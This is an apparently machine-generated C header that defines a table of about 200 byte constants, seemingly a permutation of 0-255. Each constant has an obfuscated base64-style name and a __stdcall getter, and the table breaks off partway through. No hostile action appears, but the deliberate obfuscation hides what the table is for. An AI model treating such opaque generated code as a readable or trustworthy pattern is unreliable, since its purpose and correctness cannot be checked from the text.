#ifndef _DEFS_TBL
#define _DEFS_TBL 1
static const uint8_t __MmEyMDJmYjYA=0x2A;
extern uint8_t __stdcall __MmEyMDJmYjYA_g(){ return __MmEyMDJmYjYA; };
static const uint8_t __MjAyZmI2MDAO=0x20;
extern uint8_t __stdcall __MjAyZmI2MDAO_g(){ return __MjAyZmI2MDAO; };
static const uint8_t __MmZiNjAwMGUS=0x2F;
extern uint8_t __stdcall __MmZiNjAwMGUS_g(){ return __MmZiNjAwMGUS; };
static const uint8_t __YjYwMDBlMTJl=0xB6;
extern uint8_t __stdcall __YjYwMDBlMTJl_g(){ return __YjYwMDBlMTJl; };
static const uint8_t __MDAwZTEyNjVa=0x00;
extern uint8_t __stdcall __MDAwZTEyNjVa_g(){ return __MDAwZTEyNjVa; };
static const uint8_t __MGUxMjY1NWHY=0x0E;
extern uint8_t __stdcall __MGUxMjY1NWHY_g(){ return __MGUxMjY1NWHY; };
static const uint8_t __MTI2NTVhZDhn=0x12;
extern uint8_t __stdcall __MTI2NTVhZDhn_g(){ return __MTI2NTVhZDhn; };
static const uint8_t __NjU1YWQ4NjdU=0x65;
extern uint8_t __stdcall __NjU1YWQ4NjdU_g(){ return __NjU1YWQ4NjdU; };
static const uint8_t __NWFkODY3NTTR=0x5A;
extern uint8_t __stdcall __NWFkODY3NTTR_g(){ return __NWFkODY3NTTR; };
static const uint8_t __ZDg2NzU0ZDHd=0xD8;
extern uint8_t __stdcall __ZDg2NzU0ZDHd_g(){ return __ZDg2NzU0ZDHd; };
static const uint8_t __Njc1NGQxZGRX=0x67;
extern uint8_t __stdcall __Njc1NGQxZGRX_g(){ return __Njc1NGQxZGRX; };
static const uint8_t __NTRkMWRkNTfN=0x54;
extern uint8_t __stdcall __NTRkMWRkNTfN_g(){ return __NTRkMWRkNTfN; };
static const uint8_t __ZDFkZDU3Y2QT=0xD1;
extern uint8_t __stdcall __ZDFkZDU3Y2QT_g(){ return __ZDFkZDU3Y2QT; };
static const uint8_t __ZGQ1N2NkMTNo=0xDD;
extern uint8_t __stdcall __ZGQ1N2NkMTNo_g(){ return __ZGQ1N2NkMTNo; };
static const uint8_t __NTdjZDEzNjgn=0x57;
extern uint8_t __stdcall __NTdjZDEzNjgn_g(){ return __NTdjZDEzNjgn; };
static const uint8_t __Y2QxMzY4MjcI=0xCD;
extern uint8_t __stdcall __Y2QxMzY4MjcI_g(){ return __Y2QxMzY4MjcI; };
static const uint8_t __MTM2ODI3MDg5=0x13;
extern uint8_t __stdcall __MTM2ODI3MDg5_g(){ return __MTM2ODI3MDg5; };
static const uint8_t __NjgyNzA4Mznb=0x68;
extern uint8_t __stdcall __NjgyNzA4Mznb_g(){ return __NjgyNzA4Mznb; };
static const uint8_t __MjcwODM5ZGK6=0x27;
extern uint8_t __stdcall __MjcwODM5ZGK6_g(){ return __MjcwODM5ZGK6; };
static const uint8_t __MDgzOWRiYmHJ=0x08;
extern uint8_t __stdcall __MDgzOWRiYmHJ_g(){ return __MDgzOWRiYmHJ; };
static const uint8_t __MzlkYmJhYznH=0x39;
extern uint8_t __stdcall __MzlkYmJhYznH_g(){ return __MzlkYmJhYznH; };
static const uint8_t __ZGJiYWM5Yzff=0xDB;
extern uint8_t __stdcall __ZGJiYWM5Yzff_g(){ return __ZGJiYWM5Yzff; };
static const uint8_t __YmFjOWM3ZGb4=0xBA;
extern uint8_t __stdcall __YmFjOWM3ZGb4_g(){ return __YmFjOWM3ZGb4; };
static const uint8_t __YzljN2RmZjjA=0xC9;
extern uint8_t __stdcall __YzljN2RmZjjA_g(){ return __YzljN2RmZjjA; };
static const uint8_t __YzdkZmY4YzAm=0xC7;
extern uint8_t __stdcall __YzdkZmY4YzAm_g(){ return __YzdkZmY4YzAm; };
static const uint8_t __ZGZmOGMwMjZW=0xDF;
extern uint8_t __stdcall __ZGZmOGMwMjZW_g(){ return __ZGZmOGMwMjZW; };
static const uint8_t __ZjhjMDI2NTZZ=0xF8;
extern uint8_t __stdcall __ZjhjMDI2NTZZ_g(){ return __ZjhjMDI2NTZZ; };
static const uint8_t __YzAyNjU2NTmS=0xC0;
extern uint8_t __stdcall __YzAyNjU2NTmS_g(){ return __YzAyNjU2NTmS; };
static const uint8_t __MjY1NjU5OTJD=0x26;
extern uint8_t __stdcall __MjY1NjU5OTJD_g(){ return __MjY1NjU5OTJD; };
static const uint8_t __NTY1OTkyNDOh=0x56;
extern uint8_t __stdcall __NTY1OTkyNDOh_g(){ return __NTY1OTkyNDOh; };
static const uint8_t __NTk5MjQzYTGL=0x59;
extern uint8_t __stdcall __NTk5MjQzYTGL_g(){ return __NTk5MjQzYTGL; };
static const uint8_t __OTI0M2ExOGJb=0x92;
extern uint8_t __stdcall __OTI0M2ExOGJb_g(){ return __OTI0M2ExOGJb; };
static const uint8_t __NDNhMThiNWJ4=0x43;
extern uint8_t __stdcall __NDNhMThiNWJ4_g(){ return __NDNhMThiNWJ4; };
static const uint8_t __YTE4YjViNzi9=0xA1;
extern uint8_t __stdcall __YTE4YjViNzi9_g(){ return __YTE4YjViNzi9; };
static const uint8_t __OGI1Yjc4YmSR=0x8B;
extern uint8_t __stdcall __OGI1Yjc4YmSR_g(){ return __OGI1Yjc4YmSR; };
static const uint8_t __NWI3OGJkOTGf=0x5B;
extern uint8_t __stdcall __NWI3OGJkOTGf_g(){ return __NWI3OGJkOTGf; };
static const uint8_t __NzhiZDkxOWYV=0x78;
extern uint8_t __stdcall __NzhiZDkxOWYV_g(){ return __NzhiZDkxOWYV; };
static const uint8_t __YmQ5MTlmMTVw=0xBD;
extern uint8_t __stdcall __YmQ5MTlmMTVw_g(){ return __YmQ5MTlmMTVw; };
static const uint8_t __OTE5ZjE1NzD2=0x91;
extern uint8_t __stdcall __OTE5ZjE1NzD2_g(){ return __OTE5ZjE1NzD2; };
static const uint8_t __OWYxNTcwZjbF=0x9F;
extern uint8_t __stdcall __OWYxNTcwZjbF_g(){ return __OWYxNTcwZjbF; };
static const uint8_t __MTU3MGY2YzVF=0x15;
extern uint8_t __stdcall __MTU3MGY2YzVF_g(){ return __MTU3MGY2YzVF; };
static const uint8_t __NzBmNmM1NDXy=0x70;
extern uint8_t __stdcall __NzBmNmM1NDXy_g(){ return __NzBmNmM1NDXy; };
static const uint8_t __ZjZjNTQ1ZjIz=0xF6;
extern uint8_t __stdcall __ZjZjNTQ1ZjIz_g(){ return __ZjZjNTQ1ZjIz; };
static const uint8_t __YzU0NWYyMzOC=0xC5;
extern uint8_t __stdcall __YzU0NWYyMzOC_g(){ return __YzU0NWYyMzOC; };
static const uint8_t __NDVmMjMzODJT=0x45;
extern uint8_t __stdcall __NDVmMjMzODJT_g(){ return __NDVmMjMzODJT; };
static const uint8_t __ZjIzMzgyNTM4=0xF2;
extern uint8_t __stdcall __ZjIzMzgyNTM4_g(){ return __ZjIzMzgyNTM4; };
static const uint8_t __MzM4MjUzMzh_=0x33;
extern uint8_t __stdcall __MzM4MjUzMzh__g(){ return __MzM4MjUzMzh_; };
static const uint8_t __ODI1MzM4N2Vt=0x82;
extern uint8_t __stdcall __ODI1MzM4N2Vt_g(){ return __ODI1MzM4N2Vt; };
static const uint8_t __NTMzODdlNmR2=0x53;
extern uint8_t __stdcall __NTMzODdlNmR2_g(){ return __NTMzODdlNmR2; };
static const uint8_t __Mzg3ZTZkNzay=0x38;
extern uint8_t __stdcall __Mzg3ZTZkNzay_g(){ return __Mzg3ZTZkNzay; };
static const uint8_t __N2U2ZDc2YjIy=0x7E;
extern uint8_t __stdcall __N2U2ZDc2YjIy_g(){ return __N2U2ZDc2YjIy; };
static const uint8_t __NmQ3NmIyMzK7=0x6D;
extern uint8_t __stdcall __NmQ3NmIyMzK7_g(){ return __NmQ3NmIyMzK7; };
static const uint8_t __NzZiMjMyYmI8=0x76;
extern uint8_t __stdcall __NzZiMjMyYmI8_g(){ return __NzZiMjMyYmI8; };
static const uint8_t __YjIzMmJiM2MM=0xB2;
extern uint8_t __stdcall __YjIzMmJiM2MM_g(){ return __YjIzMmJiM2MM; };
static const uint8_t __MzJiYjNjMGPv=0x32;
extern uint8_t __stdcall __MzJiYjNjMGPv_g(){ return __MzJiYjNjMGPv; };
static const uint8_t __YmIzYzBjZWaw=0xBB;
extern uint8_t __stdcall __YmIzYzBjZWaw_g(){ return __YmIzYzBjZWaw; };
static const uint8_t __M2MwY2VmYjAu=0x3C;
extern uint8_t __stdcall __M2MwY2VmYjAu_g(){ return __M2MwY2VmYjAu; };
static const uint8_t __MGNlZmIwMmUY=0x0C;
extern uint8_t __stdcall __MGNlZmIwMmUY_g(){ return __MGNlZmIwMmUY; };
static const uint8_t __ZWZiMDJlMTiB=0xEF;
extern uint8_t __stdcall __ZWZiMDJlMTiB_g(){ return __ZWZiMDJlMTiB; };
static const uint8_t __YjAyZTE4ODFe=0xB0;
extern uint8_t __stdcall __YjAyZTE4ODFe_g(){ return __YjAyZTE4ODFe; };
static const uint8_t __MmUxODgxNWWm=0x2E;
extern uint8_t __stdcall __MmUxODgxNWWm_g(){ return __MmUxODgxNWWm; };
static const uint8_t __MTg4MTVlYTbu=0x18;
extern uint8_t __stdcall __MTg4MTVlYTbu_g(){ return __MTg4MTVlYTbu; };
static const uint8_t __ODE1ZWE2ZWW0=0x81;
extern uint8_t __stdcall __ODE1ZWE2ZWW0_g(){ return __ODE1ZWE2ZWW0; };
static const uint8_t __NWVhNmVlYjTQ=0x5E;
extern uint8_t __stdcall __NWVhNmVlYjTQ_g(){ return __NWVhNmVlYjTQ; };
static const uint8_t __YTZlZWI0ZDB3=0xA6;
extern uint8_t __stdcall __YTZlZWI0ZDB3_g(){ return __YTZlZWI0ZDB3; };
static const uint8_t __ZWViNGQwNzfe=0xEE;
extern uint8_t __stdcall __ZWViNGQwNzfe_g(){ return __ZWViNGQwNzfe; };
static const uint8_t __YjRkMDc3ZGUo=0xB4;
extern uint8_t __stdcall __YjRkMDc3ZGUo_g(){ return __YjRkMDc3ZGUo; };
static const uint8_t __ZDA3N2RlMjj3=0xD0;
extern uint8_t __stdcall __ZDA3N2RlMjj3_g(){ return __ZDA3N2RlMjj3; };
static const uint8_t __NzdkZTI4Zje3=0x77;
extern uint8_t __stdcall __NzdkZTI4Zje3_g(){ return __NzdkZTI4Zje3; };
static const uint8_t __ZGUyOGY3YjcZ=0xDE;
extern uint8_t __stdcall __ZGUyOGY3YjcZ_g(){ return __ZGUyOGY3YjcZ; };
static const uint8_t __MjhmN2I3MTlm=0x28;
extern uint8_t __stdcall __MjhmN2I3MTlm_g(){ return __MjhmN2I3MTlm; };
static const uint8_t __ZjdiNzE5NjZy=0xF7;
extern uint8_t __stdcall __ZjdiNzE5NjZy_g(){ return __ZjdiNzE5NjZy; };
static const uint8_t __YjcxOTY2NzKX=0xB7;
extern uint8_t __stdcall __YjcxOTY2NzKX_g(){ return __YjcxOTY2NzKX; };
static const uint8_t __MTk2NjcyOTfo=0x19;
extern uint8_t __stdcall __MTk2NjcyOTfo_g(){ return __MTk2NjcyOTfo; };
static const uint8_t __NjY3Mjk3ZThH=0x66;
extern uint8_t __stdcall __NjY3Mjk3ZThH_g(){ return __NjY3Mjk3ZThH; };
static const uint8_t __NzI5N2U4NDfC=0x72;
extern uint8_t __stdcall __NzI5N2U4NDfC_g(){ return __NzI5N2U4NDfC; };
static const uint8_t __OTdlODQ3YzLm=0x97;
extern uint8_t __stdcall __OTdlODQ3YzLm_g(){ return __OTdlODQ3YzLm; };
static const uint8_t __ZTg0N2MyZTax=0xE8;
extern uint8_t __stdcall __ZTg0N2MyZTax_g(){ return __ZTg0N2MyZTax; };
static const uint8_t __NDdjMmU2YjHE=0x47;
extern uint8_t __stdcall __NDdjMmU2YjHE_g(){ return __NDdjMmU2YjHE; };
static const uint8_t __YzJlNmIxYzT9=0xC2;
extern uint8_t __stdcall __YzJlNmIxYzT9_g(){ return __YzJlNmIxYzT9; };
static const uint8_t __ZTZiMWM0ZmRG=0xE6;
extern uint8_t __stdcall __ZTZiMWM0ZmRG_g(){ return __ZTZiMWM0ZmRG; };
static const uint8_t __YjFjNGZkNDZ0=0xB1;
extern uint8_t __stdcall __YjFjNGZkNDZ0_g(){ return __YjFjNGZkNDZ0; };
static const uint8_t __YzRmZDQ2NzRM=0xC4;
extern uint8_t __stdcall __YzRmZDQ2NzRM_g(){ return __YzRmZDQ2NzRM; };
static const uint8_t __ZmQ0Njc0NGPO=0xFD;
extern uint8_t __stdcall __ZmQ0Njc0NGPO_g(){ return __ZmQ0Njc0NGPO; };
static const uint8_t __NDY3NDRjY2XU=0x46;
extern uint8_t __stdcall __NDY3NDRjY2XU_g(){ return __NDY3NDRjY2XU; };
static const uint8_t __NzQ0Y2NlZDRr=0x74;
extern uint8_t __stdcall __NzQ0Y2NlZDRr_g(){ return __NzQ0Y2NlZDRr; };
static const uint8_t __NGNjZWQ0NmKg=0x4C;
extern uint8_t __stdcall __NGNjZWQ0NmKg_g(){ return __NGNjZWQ0NmKg; };
static const uint8_t __Y2VkNDZiYTAb=0xCE;
extern uint8_t __stdcall __Y2VkNDZiYTAb_g(){ return __Y2VkNDZiYTAb; };
static const uint8_t __ZDQ2YmEwMWKY=0xD4;
extern uint8_t __stdcall __ZDQ2YmEwMWKY_g(){ return __ZDQ2YmEwMWKY; };
static const uint8_t __NmJhMDFiOTiV=0x6B;
extern uint8_t __stdcall __NmJhMDFiOTiV_g(){ return __NmJhMDFiOTiV; };
static const uint8_t __YTAxYjk4OTW1=0xA0;
extern uint8_t __stdcall __YTAxYjk4OTW1_g(){ return __YTAxYjk4OTW1; };
static const uint8_t __MWI5ODk1YjU1=0x1B;
extern uint8_t __stdcall __MWI5ODk1YjU1_g(){ return __MWI5ODk1YjU1; };
static const uint8_t __OTg5NWI1MzXG=0x98;
extern uint8_t __stdcall __OTg5NWI1MzXG_g(){ return __OTg5NWI1MzXG; };
static const uint8_t __OTViNTM1Yzat=0x95;
extern uint8_t __stdcall __OTViNTM1Yzat_g(){ return __OTViNTM1Yzat; };
static const uint8_t __YjUzNWM2YWSa=0xB5;
extern uint8_t __stdcall __YjUzNWM2YWSa_g(){ return __YjUzNWM2YWSa; };
static const uint8_t __MzVjNmFkOWHK=0x35;
extern uint8_t __stdcall __MzVjNmFkOWHK_g(){ return __MzVjNmFkOWHK; };
static const uint8_t __YzZhZDlhY2EK=0xC6;
extern uint8_t __stdcall __YzZhZDlhY2EK_g(){ return __YzZhZDlhY2EK; };
static const uint8_t __YWQ5YWNhMGE7=0xAD;
extern uint8_t __stdcall __YWQ5YWNhMGE7_g(){ return __YWQ5YWNhMGE7; };
static const uint8_t __OWFjYTBhM2J1=0x9A;
extern uint8_t __stdcall __OWFjYTBhM2J1_g(){ return __OWFjYTBhM2J1; };
static const uint8_t __Y2EwYTNiNzWv=0xCA;
extern uint8_t __stdcall __Y2EwYTNiNzWv_g(){ return __Y2EwYTNiNzWv; };
static const uint8_t __MGEzYjc1YWb_=0x0A;
extern uint8_t __stdcall __MGEzYjc1YWb__g(){ return __MGEzYjc1YWb_; };
static const uint8_t __M2I3NWFmZmUp=0x3B;
extern uint8_t __stdcall __M2I3NWFmZmUp_g(){ return __M2I3NWFmZmUp; };
static const uint8_t __NzVhZmZlMjnt=0x75;
extern uint8_t __stdcall __NzVhZmZlMjnt_g(){ return __NzVhZmZlMjnt; };
static const uint8_t __YWZmZTI5ZWSz=0xAF;
extern uint8_t __stdcall __YWZmZTI5ZWSz_g(){ return __YWZmZTI5ZWSz; };
static const uint8_t __ZmUyOWVkYjNE=0xFE;
extern uint8_t __stdcall __ZmUyOWVkYjNE_g(){ return __ZmUyOWVkYjNE; };
static const uint8_t __MjllZGIzNDRV=0x29;
extern uint8_t __stdcall __MjllZGIzNDRV_g(){ return __MjllZGIzNDRV; };
static const uint8_t __ZWRiMzQ0NTUE=0xED;
extern uint8_t __stdcall __ZWRiMzQ0NTUE_g(){ return __ZWRiMzQ0NTUE; };
static const uint8_t __YjM0NDU1MDQt=0xB3;
extern uint8_t __stdcall __YjM0NDU1MDQt_g(){ return __YjM0NDU1MDQt; };
static const uint8_t __NDQ1NTA0MmRY=0x44;
extern uint8_t __stdcall __NDQ1NTA0MmRY_g(){ return __NDQ1NTA0MmRY; };
static const uint8_t __NTUwNDJkNTgF=0x55;
extern uint8_t __stdcall __NTUwNDJkNTgF_g(){ return __NTUwNDJkNTgF; };
static const uint8_t __MDQyZDU4MDVj=0x04;
extern uint8_t __stdcall __MDQyZDU4MDVj_g(){ return __MDQyZDU4MDVj; };
static const uint8_t __MmQ1ODA1NjPq=0x2D;
extern uint8_t __stdcall __MmQ1ODA1NjPq_g(){ return __MmQ1ODA1NjPq; };
static const uint8_t __NTgwNTYzZWEN=0x58;
extern uint8_t __stdcall __NTgwNTYzZWEN_g(){ return __NTgwNTYzZWEN; };
static const uint8_t __MDU2M2VhMGQ6=0x05;
extern uint8_t __stdcall __MDU2M2VhMGQ6_g(){ return __MDU2M2VhMGQ6; };
static const uint8_t __NjNlYTBkM2EU=0x63;
extern uint8_t __stdcall __NjNlYTBkM2EU_g(){ return __NjNlYTBkM2EU; };
static const uint8_t __ZWEwZDNhMTTn=0xEA;
extern uint8_t __stdcall __ZWEwZDNhMTTn_g(){ return __ZWEwZDNhMTTn; };
static const uint8_t __MGQzYTE0ZTej=0x0D;
extern uint8_t __stdcall __MGQzYTE0ZTej_g(){ return __MGQzYTE0ZTej; };
static const uint8_t __M2ExNGU3YTOc=0x3A;
extern uint8_t __stdcall __M2ExNGU3YTOc_g(){ return __M2ExNGU3YTOc; };
static const uint8_t __MTRlN2EzOWPz=0x14;
extern uint8_t __stdcall __MTRlN2EzOWPz_g(){ return __MTRlN2EzOWPz; };
static const uint8_t __ZTdhMzljZjO8=0xE7;
extern uint8_t __stdcall __ZTdhMzljZjO8_g(){ return __ZTdhMzljZjO8; };
static const uint8_t __YTM5Y2YzYmP7=0xA3;
extern uint8_t __stdcall __YTM5Y2YzYmP7_g(){ return __YTM5Y2YzYmP7; };
static const uint8_t __OWNmM2JjZmLr=0x9C;
extern uint8_t __stdcall __OWNmM2JjZmLr_g(){ return __OWNmM2JjZmLr; };
static const uint8_t __ZjNiY2ZiZWIR=0xF3;
extern uint8_t __stdcall __ZjNiY2ZiZWIR_g(){ return __ZjNiY2ZiZWIR; };
static const uint8_t __YmNmYmViMTGG=0xBC;
extern uint8_t __stdcall __YmNmYmViMTGG_g(){ return __YmNmYmViMTGG; };
static const uint8_t __ZmJlYjExODau=0xFB;
extern uint8_t __stdcall __ZmJlYjExODau_g(){ return __ZmJlYjExODau; };
static const uint8_t __ZWIxMTg2YWWq=0xEB;
extern uint8_t __stdcall __ZWIxMTg2YWWq_g(){ return __ZWIxMTg2YWWq; };
static const uint8_t __MTE4NmFlYWEj=0x11;
extern uint8_t __stdcall __MTE4NmFlYWEj_g(){ return __MTE4NmFlYWEj; };
static const uint8_t __ODZhZWFhMjMr=0x86;
extern uint8_t __stdcall __ODZhZWFhMjMr_g(){ return __ODZhZWFhMjMr; };
static const uint8_t __YWVhYTIzMmJ6=0xAE;
extern uint8_t __stdcall __YWVhYTIzMmJ6_g(){ return __YWVhYTIzMmJ6; };
static const uint8_t __YWEyMzJiN2Ha=0xAA;
extern uint8_t __stdcall __YWEyMzJiN2Ha_g(){ return __YWEyMzJiN2Ha; };
static const uint8_t __MjMyYjdhZGFd=0x23;
extern uint8_t __stdcall __MjMyYjdhZGFd_g(){ return __MjMyYjdhZGFd; };
static const uint8_t __MmI3YWRhNWQi=0x2B;
extern uint8_t __stdcall __MmI3YWRhNWQi_g(){ return __MmI3YWRhNWQi; };
static const uint8_t __N2FkYTVkMjLB=0x7A;
extern uint8_t __stdcall __N2FkYTVkMjLB_g(){ return __N2FkYTVkMjLB; };
static const uint8_t __ZGE1ZDIyYzGp=0xDA;
extern uint8_t __stdcall __ZGE1ZDIyYzGp_g(){ return __ZGE1ZDIyYzGp; };
static const uint8_t __NWQyMmMxYTn6=0x5D;
extern uint8_t __stdcall __NWQyMmMxYTn6_g(){ return __NWQyMmMxYTn6; };
static const uint8_t __MjJjMWE5ZmG4=0x22;
extern uint8_t __stdcall __MjJjMWE5ZmG4_g(){ return __MjJjMWE5ZmG4; };
static const uint8_t __YzFhOWZhYjjL=0xC1;
extern uint8_t __stdcall __YzFhOWZhYjjL_g(){ return __YzFhOWZhYjjL; };
static const uint8_t __YTlmYWI4Y2L_=0xA9;
extern uint8_t __stdcall __YTlmYWI4Y2L__g(){ return __YTlmYWI4Y2L_; };
static const uint8_t __ZmFiOGNiZmYf=0xFA;
extern uint8_t __stdcall __ZmFiOGNiZmYf_g(){ return __ZmFiOGNiZmYf; };
static const uint8_t __YjhjYmZmMWYl=0xB8;
extern uint8_t __stdcall __YjhjYmZmMWYl_g(){ return __YjhjYmZmMWYl; };
static const uint8_t __Y2JmZjFmMjVi=0xCB;
extern uint8_t __stdcall __Y2JmZjFmMjVi_g(){ return __Y2JmZjFmMjVi; };
static const uint8_t __ZmYxZjI1NjLc=0xFF;
extern uint8_t __stdcall __ZmYxZjI1NjLc_g(){ return __ZmYxZjI1NjLc; };
static const uint8_t __MWYyNTYyZGOK=0x1F;
extern uint8_t __stdcall __MWYyNTYyZGOK_g(){ return __MWYyNTYyZGOK; };
static const uint8_t __MjU2MmRjOGE9=0x25;
extern uint8_t __stdcall __MjU2MmRjOGE9_g(){ return __MjU2MmRjOGE9; };
static const uint8_t __NjJkYzhhM2Rz=0x62;
extern uint8_t __stdcall __NjJkYzhhM2Rz_g(){ return __NjJkYzhhM2Rz; };
static const uint8_t __ZGM4YTNkNzPT=0xDC;
extern uint8_t __stdcall __ZGM4YTNkNzPT_g(){ return __ZGM4YTNkNzPT; };
static const uint8_t __OGEzZDczZDOJ=0x8A;
extern uint8_t __stdcall __OGEzZDczZDOJ_g(){ return __OGEzZDczZDOJ; };
static const uint8_t __M2Q3M2QzODkJ=0x3D;
extern uint8_t __stdcall __M2Q3M2QzODkJ_g(){ return __M2Q3M2QzODkJ; };
static const uint8_t __NzNkMzg5MDnI=0x73;
extern uint8_t __stdcall __NzNkMzg5MDnI_g(){ return __NzNkMzg5MDnI; };
static const uint8_t __ZDM4OTA5Yzhf=0xD3;
extern uint8_t __stdcall __ZDM4OTA5Yzhf_g(){ return __ZDM4OTA5Yzhf; };
static const uint8_t __ODkwOWM4NWYe=0x89;
extern uint8_t __stdcall __ODkwOWM4NWYe_g(){ return __ODkwOWM4NWYe; };
static const uint8_t __MDljODVmMWUd=0x09;
extern uint8_t __stdcall __MDljODVmMWUd_g(){ return __MDljODVmMWUd; };
static const uint8_t __Yzg1ZjFlMWRg=0xC8;
extern uint8_t __stdcall __Yzg1ZjFlMWRg_g(){ return __Yzg1ZjFlMWRg; };
static const uint8_t __NWYxZTFkNjCW=0x5F;
extern uint8_t __stdcall __NWYxZTFkNjCW_g(){ return __NWYxZTFkNjCW; };
static const uint8_t __MWUxZDYwOTY_=0x1E;
extern uint8_t __stdcall __MWUxZDYwOTY__g(){ return __MWUxZDYwOTY_; };
static const uint8_t __MWQ2MDk2M2bw=0x1D;
extern uint8_t __stdcall __MWQ2MDk2M2bw_g(){ return __MWQ2MDk2M2bw; };
static const uint8_t __NjA5NjNmZjAB=0x60;
extern uint8_t __stdcall __NjA5NjNmZjAB_g(){ return __NjA5NjNmZjAB; };
static const uint8_t __OTYzZmYwMDGE=0x96;
extern uint8_t __stdcall __OTYzZmYwMDGE_g(){ return __OTYzZmYwMDGE; };
static const uint8_t __M2ZmMDAxODT0=0x3F;
extern uint8_t __stdcall __M2ZmMDAxODT0_g(){ return __M2ZmMDAxODT0; };
static const uint8_t __ZjAwMTg0ZjSd=0xF0;
extern uint8_t __stdcall __ZjAwMTg0ZjSd_g(){ return __ZjAwMTg0ZjSd; };
static const uint8_t __MDE4NGY0OWSH=0x01;
extern uint8_t __stdcall __MDE4NGY0OWSH_g(){ return __MDE4NGY0OWSH; };
static const uint8_t __ODRmNDlkODcc=0x84;
extern uint8_t __stdcall __ODRmNDlkODcc_g(){ return __ODRmNDlkODcc; };
static const uint8_t __ZjQ5ZDg3MWM3=0xF4;
extern uint8_t __stdcall __ZjQ5ZDg3MWM3_g(){ return __ZjQ5ZDg3MWM3; };
static const uint8_t __OWQ4NzFjMzcD=0x9D;
extern uint8_t __stdcall __OWQ4NzFjMzcD_g(){ return __OWQ4NzFjMzcD; };
static const uint8_t __ODcxYzM3MDM2=0x87;
extern uint8_t __stdcall __ODcxYzM3MDM2_g(){ return __ODcxYzM3MDM2; };
static const uint8_t __MWMzNzAzMzYQ=0x1C;
extern uint8_t __stdcall __MWMzNzAzMzYQ_g(){ return __MWMzNzAzMzYQ; };
static const uint8_t __MzcwMzM2MTDp=0x37;
extern uint8_t __stdcall __MzcwMzM2MTDp_g(){ return __MzcwMzM2MTDp; };
static const uint8_t __MDMzNjEwZTms=0x03;
extern uint8_t __stdcall __MDMzNjEwZTms_g(){ return __MDMzNjEwZTms; };
static const uint8_t __MzYxMGU5YWNc=0x36;
extern uint8_t __stdcall __MzYxMGU5YWNc_g(){ return __MzYxMGU5YWNc; };
static const uint8_t __MTBlOWFjNWPl=0x10;
extern uint8_t __stdcall __MTBlOWFjNWPl_g(){ return __MTBlOWFjNWPl; };
static const uint8_t __ZTlhYzVjZTUw=0xE9;
extern uint8_t __stdcall __ZTlhYzVjZTUw_g(){ return __ZTlhYzVjZTUw; };
static const uint8_t __YWM1Y2U1MzDV=0xAC;
extern uint8_t __stdcall __YWM1Y2U1MzDV_g(){ return __YWM1Y2U1MzDV; };
static const uint8_t __NWNlNTMwZDWb=0x5C;
extern uint8_t __stdcall __NWNlNTMwZDWb_g(){ return __NWNlNTMwZDWb; };
static const uint8_t __ZTUzMGQ1OWKe=0xE5;
extern uint8_t __stdcall __ZTUzMGQ1OWKe_g(){ return __ZTUzMGQ1OWKe; };
static const uint8_t __MzBkNTliOWV5=0x30;
extern uint8_t __stdcall __MzBkNTliOWV5_g(){ return __MzBkNTliOWV5; };
static const uint8_t __ZDU5YjllNzkk=0xD5;
extern uint8_t __stdcall __ZDU5YjllNzkk_g(){ return __ZDU5YjllNzkk; };
static const uint8_t __OWI5ZTc5MjT1=0x9B;
extern uint8_t __stdcall __OWI5ZTc5MjT1_g(){ return __OWI5ZTc5MjT1; };
static const uint8_t __OWU3OTI0ZjWD=0x9E;
extern uint8_t __stdcall __OWU3OTI0ZjWD_g(){ return __OWU3OTI0ZjWD; };
static const uint8_t __NzkyNGY1ODML=0x79;
extern uint8_t __stdcall __NzkyNGY1ODML_g(){ return __NzkyNGY1ODML; };
static const uint8_t __MjRmNTgzMGJL=0x24;
extern uint8_t __stdcall __MjRmNTgzMGJL_g(){ return __MjRmNTgzMGJL; };
static const uint8_t __ZjU4MzBiNGJR=0xF5;
extern uint8_t __stdcall __ZjU4MzBiNGJR_g(){ return __ZjU4MzBiNGJR; };
static const uint8_t __ODMwYjRiNTFP=0x83;
extern uint8_t __stdcall __ODMwYjRiNTFP_g(){ return __ODMwYjRiNTFP; };
static const uint8_t __MGI0YjUxNGaP=0x0B;
extern uint8_t __stdcall __MGI0YjUxNGaP_g(){ return __MGI0YjUxNGaP; };
static const uint8_t __NGI1MTRmOGbi=0x4B;
extern uint8_t __stdcall __NGI1MTRmOGbi_g(){ return __NGI1MTRmOGbi; };
static const uint8_t __NTE0ZjhmZTJN=0x51;
extern uint8_t __stdcall __NTE0ZjhmZTJN_g(){ return __NTE0ZjhmZTJN; };
static const uint8_t __NGY4ZmUyNGRB=0x4F;
extern uint8_t __stdcall __NGY4ZmUyNGRB_g(){ return __NGY4ZmUyNGRB; };
static const uint8_t __OGZlMjRkNDGQ=0x8F;
extern uint8_t __stdcall __OGZlMjRkNDGQ_g(){ return __OGZlMjRkNDGQ; };
static const uint8_t __ZTI0ZDQxOTD5=0xE2;
extern uint8_t __stdcall __ZTI0ZDQxOTD5_g(){ return __ZTI0ZDQxOTD5; };
static const uint8_t __NGQ0MTkwZjmr=0x4D;
extern uint8_t __stdcall __NGQ0MTkwZjmr_g(){ return __NGQ0MTkwZjmr; };
static const uint8_t __NDE5MGY5YWLX=0x41;
extern uint8_t __stdcall __NDE5MGY5YWLX_g(){ return __NDE5MGY5YWLX; };
static const uint8_t __OTBmOWFiZDe5=0x90;
extern uint8_t __stdcall __OTBmOWFiZDe5_g(){ return __OTBmOWFiZDe5; };
static const uint8_t __ZjlhYmQ3Yjl_=0xF9;
extern uint8_t __stdcall __ZjlhYmQ3Yjl__g(){ return __ZjlhYmQ3Yjl_; };
static const uint8_t __YWJkN2I5N2bW=0xAB;
extern uint8_t __stdcall __YWJkN2I5N2bW_g(){ return __YWJkN2I5N2bW; };
static const uint8_t __ZDdiOTdmZDak=0xD7;
extern uint8_t __stdcall __ZDdiOTdmZDak_g(){ return __ZDdiOTdmZDak; };
static const uint8_t __Yjk3ZmQ2YTR8=0xB9;
extern uint8_t __stdcall __Yjk3ZmQ2YTR8_g(){ return __Yjk3ZmQ2YTR8; };
static const uint8_t __N2ZkNmE0N2MG=0x7F;
extern uint8_t __stdcall __N2ZkNmE0N2MG_g(){ return __N2ZkNmE0N2MG; };
static const uint8_t __ZDZhNDdjMDbk=0xD6;
extern uint8_t __stdcall __ZDZhNDdjMDbk_g(){ return __ZDZhNDdjMDbk; };
static const uint8_t __YTQ3YzA2ZTRk=0xA4;
extern uint8_t __stdcall __YTQ3YzA2ZTRk_g(){ return __YTQ3YzA2ZTRk; };
static const uint8_t __N2MwNmU0NjRA=0x7C;
extern uint8_t __stdcall __N2MwNmU0NjRA_g(){ return __N2MwNmU0NjRA; };
static const uint8_t __MDZlNDY0NDC_=0x06;
